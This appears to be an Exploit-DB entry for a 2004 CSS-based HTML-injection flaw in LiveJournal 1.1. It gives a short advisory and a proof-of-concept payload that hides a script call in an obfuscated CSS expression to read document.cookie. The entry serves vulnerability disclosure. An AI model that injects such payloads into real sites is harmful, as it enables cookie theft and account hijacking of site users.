LiveJournal 1.1 - CSS HTML Injection

EDB-ID:

23749

CVE:

N/A




Platform:

PHP

Date:

2004-02-23


source: https://www.securityfocus.com/bid/9727/info

LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. 

This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.

<style>
.test1 { color:e\xpression(alert(document.cookie)); }
</style>

<a class="test1">foo</a>